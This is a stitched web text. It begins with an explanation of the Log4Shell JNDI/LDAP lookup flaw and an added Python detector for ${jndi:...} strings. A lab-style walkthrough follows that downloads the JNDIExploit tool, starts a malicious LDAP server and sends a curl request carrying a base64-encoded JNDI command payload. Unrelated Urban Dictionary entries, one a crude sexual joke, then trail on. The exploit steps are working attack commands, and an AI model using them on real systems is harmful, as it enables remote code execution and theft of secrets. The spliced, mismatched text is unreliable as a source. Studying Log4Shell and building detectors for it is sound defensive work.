The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can leverage several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
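The substitution format described above, as an added defensive example that is not part of the original entry: a Python parser for `${prefix:name}` lookups (including the nested form that would leak environment data into the URL) and a classifier that flags JNDI lookups over the protocols listed. The input strings are constructed and nothing here contacts a server.

```python
# Added example, not code from the original page: parse Log4j 2 lookup
# expressions ${prefix:name}, nested ones included, and flag JNDI lookups in
# untrusted input such as request headers. Sample inputs are constructed.

JNDI_SCHEMES = {"ldap", "ldaps", "rmi", "dns", "iiop"}   # protocols named on the page
LEAK_PREFIXES = {"env", "sys", "java"}  # lookups that substitute host data into the URL

def parse_lookups(text):
    """Return [(prefix, body), ...] for every ${prefix:body} in text, ordered by
    start position; bodies keep any nested ${...} verbatim."""
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i + 2)          # remember where this body starts
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            prefix, sep, body = text[start:i].partition(":")
            if sep:                      # "${foo}" without a colon is not a lookup
                found.append((start, prefix.strip().lower(), body))
        i += 1
    return [(p, b) for _, p, b in sorted(found)]

def assess(text):
    """Classify one untrusted string: is a JNDI lookup present, which of the
    listed protocols it uses, and which nested lookups would leak host data."""
    schemes, leaks, jndi_seen = set(), set(), False
    for prefix, body in parse_lookups(text):
        if prefix != "jndi":
            continue
        jndi_seen = True
        scheme = body.split("://", 1)[0].strip().lower() if "://" in body else ""
        if scheme in JNDI_SCHEMES:
            schemes.add(scheme)
        for inner_prefix, _ in parse_lookups(body):   # e.g. ${env:SECRET} inside the URL
            if inner_prefix in LEAK_PREFIXES:
                leaks.add(inner_prefix)
    return {"jndi": jndi_seen, "schemes": sorted(schemes), "leaks": sorted(leaks)}

if __name__ == "__main__":
    samples = [  # constructed header values, not captured traffic
        "X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command}",
        "${jndi:rmi://example.invalid/${env:DB_PASSWORD}}",
        "Text: ${java:version}",
    ]
    for s in samples:
        print(s, "->", assess(s))
```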
To execute commands with Log4Shell, I’ll be spinning up an LDAP server with the capabilities to exploit JNDI injection attacks written by feihong-cs. Run the following to download the malicious LDAP server:
cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
With the ZIP archive decompressed, we can retrieve the program's help menu with the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001
And finally, to obtain our reverse shell, let’s base64 encode an echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):
echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0
And then make the following request to the vulnerable application:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'
We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirming that the file note.txt was created in the /tmp folder:
by Bad C dev December 15, 2021
(li-ga- sho-o)
The act of mentally or physically harming someone after they try to get you with a "ligma" joke
guy 1: hey bro, have you heard of ligma?
guy 2: no bro but didn't you lick your grandpa's balls last night
guy 1: how the fuck do you know that-
guy 2: ligashoo... bitch.
by JackHorseFeather February 12, 2022
by Lil Coohie clencher April 7, 2022
by andyrodwill April 8, 2022
He will sure as heck stand for the flag and stand for the cross
Lmao what a loser, jk the exact opposite
by JoshuaNetfold May 1, 2022
Logan Roy is one of the best people you will ever meet. He may seem mean and scary but once you know him you grow to love him. He is super hot and soon you will fall head over heels for him. Trust me, Logan is the way to go.
by TheBestAccount October 25, 2022
Logan is a sharp individual, and can easily read between the lines.
Logan is adamant, and can fend for himself
Logan is smart, and hardheaded
Logan doesn't open up to people easily, because he's aware of how people can be
Logan is wise, because he got hurt a lot..
Logan can be agile too..
Logan is fragile inside
Logan just wants to be loved and accepted...he doesn't want or expect anything more than that
Logan is a peculiar boy
Logan loves Hardstyle music.. And nightcore
Logan is the realest person I've ever met
Logan is so beautiful, I never want to stop looking at him
Logan also makes me feel different, in an unexplainable way
Logan drives me crazy but
Logan also makes me happy. Not because Logan did a singular specific thing... But solely because
Logan is Logan, and
Logan loves me
by Firstblood January 8, 2023